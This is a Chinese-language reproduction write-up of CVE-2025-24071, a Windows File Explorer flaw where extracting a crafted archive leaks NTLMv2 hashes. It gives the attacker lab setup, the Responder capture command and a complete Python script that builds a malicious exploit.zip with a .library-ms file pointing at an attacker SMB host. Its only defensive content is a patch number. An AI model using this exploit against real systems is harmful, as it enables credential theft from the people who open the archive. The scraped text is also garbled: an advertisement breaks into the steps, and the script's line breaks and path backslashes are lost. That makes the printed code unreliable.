0x00 前言
Windows 文件资源管理器(File Explorer)作为操作系统的关键组成部分,承担着管理本地与网络文件资源的核心任务。它提供用户友好的图形界面,支持对文件和文件夹进行创建、复制、移动、删除、重命名等基本操作,同时集成了网络共享访问、外部设备识别、文件搜索与过滤等高级功能,是日常多任务文件处理不可或缺的工具。
0x01 漏洞概述
当 Windows 资源管理器在解压含有特殊构造的
.library-ms
文件的 RAR 或 ZIP 压缩包时,会自动读取并解析其中嵌入的恶意 SMB 路径(例如
\192.168.1.116shared
),从而引发隐式的 NTLM 认证请求,造成用户的 NTLMv2 哈希值泄露,存在严重的安全风险。
0x02 漏洞验证过程
(1) 所需工具清单
Windows 主机(目标机器)IP: 192.168.2.11 Kali Linux 主机(攻击方)IP: 192.168.2.12 CVE-2025-24071 的利用脚本 a.py Kali Linux 上的中间人攻击工具 Responder
(2) 实际复现步骤
1、配置 Windows 主机 IP 地址为 192.168.2.11
2、设置 Kali Linux 的 IP 为 192.168.2.12
3、在 Kali 系统中启动 Responder 工具,执行命令:
晓象AI资讯阅读神器
晓象-AI时代的资讯阅读神器
25 查看详情
sudo responder -I eth0 -v
4、运行 Python 脚本生成恶意压缩包,命令如下:
python a.py
a.py 脚本代码如下:
import osimport zipfiledef main(): file_name = input("Enter your file name: ") ip_address = input("Enter IP (EX: 192.168.1.162): ") library_content = f"""\{ip_address}shared""" library_file_name = f"{file_name}.library-ms" with open(library_file_name, "w", encoding="utf-8") as f: f.write(library_content) with zipfile.ZipFile("exploit.zip", mode="w", compression=zipfile.ZIP_DEFLATED) as zipf: zipf.write(library_file_name) if os.path.exists(library_file_name): os.remove(library_file_name) print("completed")if __name__ == "__main__": main()
5、将生成的 exploit.zip 文件传输至 Windows 系统并进行解压操作。
6、Kali Linux 成功捕获来自 Windows 的 NTLMv2 哈希凭证
0x03 修复方案
微软已发布补丁修复此漏洞,补丁编号为:KB5053606
0x04 参考资料
https://www.php.cn/link/f08f86e95c9d083c89f058285f9ff636
以上就是【漏洞复现】CVE-2025-24071|Windows 文件资源管理器欺骗漏洞的详细内容,更多请关注创想鸟其它相关文章!
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 chuangxiangniao@163.com 举报,一经查实,本站将立刻删除。
发布者:程序猿,转转请注明出处:https://www.chuangxiangniao.com/p/390920.html
微信扫一扫
支付宝扫一扫